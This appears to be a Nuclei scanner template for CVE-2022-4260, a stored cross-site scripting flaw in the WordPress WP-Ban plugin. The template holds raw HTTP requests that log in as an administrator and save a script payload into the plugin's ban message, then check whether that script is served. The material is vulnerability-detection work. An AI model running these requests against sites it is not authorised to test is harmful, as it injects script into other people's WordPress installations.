71 lines
2.4 KiB
YAML
71 lines
2.4 KiB
YAML
|
id: CVE-2022-4260
|
||
|
|
||
|
info:
|
||
|
name: WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting
|
||
|
author: Hardik-Solanki
|
||
|
severity: medium
|
||
|
description: |
|
||
|
WordPress WP-Ban plugin before 1.69.1 contains a stored cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, which can allow high-privilege users to steal cookie-based authentication credentials and launch other attacks. This vulnerability can be exploited even when the unfiltered_html capability is disallowed, for example in multisite setup.
|
||
|
reference:
|
||
|
- https://wpscan.com/vulnerability/d0cf24be-df87-4e1f-aae7-e9684c88e7db
|
||
|
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4260
|
||
|
- https://drive.google.com/file/d/11nQ21cQ9irajYqNqsQtNrLJOkeRcwCXn/view?usp=drivesdk
|
||
|
remediation: Fixed in version 1.69.1
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
|
||
|
cvss-score: 4.8
|
||
|
cve-id: CVE-2022-4260
|
||
|
cwe-id: CWE-79
|
||
|
metadata:
|
||
|
verified: "true"
|
||
|
tags: cve2022,wp-plugin,xss,wordpress,wpscan,wp,authenticated,cve,wp-ban
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /wp-login.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Origin: {{RootURL}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
Cookie: wordpress_test_cookie=WP%20Cookie%20check
|
||
|
|
||
|
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
|
||
|
|
||
|
- |
|
||
|
GET / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
- |
|
||
|
POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Dwp-ban%252Fban-options.php&banned_ips=&banned_ips_range=&banned_hosts=&banned_referers=XSS&banned_user_agents=&banned_exclude_ips=&banned_template_message=%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&Submit=Save+Changes
|
||
|
|
||
|
- |
|
||
|
GET / HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Referer: XSS
|
||
|
|
||
|
host-redirects: true
|
||
|
max-redirects: 2
|
||
|
cookie-reuse: true
|
||
|
req-condition: true
|
||
|
matchers:
|
||
|
- type: dsl
|
||
|
dsl:
|
||
|
- 'contains(body_4, "<script>alert(document.domain);</script>")'
|
||
|
- 'contains(content_type_4, "text/html")'
|
||
|
- 'status_code_4 == 200'
|
||
|
condition: and
|
||
|
|
||
|
extractors:
|
||
|
- type: regex
|
||
|
name: nonce
|
||
|
part: body
|
||
|
group: 1
|
||
|
regex:
|
||
|
- '_wpnonce=([0-9a-z]+)'
|
||
|
internal: true
|
||
|
|
||
|
# Enhanced by md on 2023/01/06
|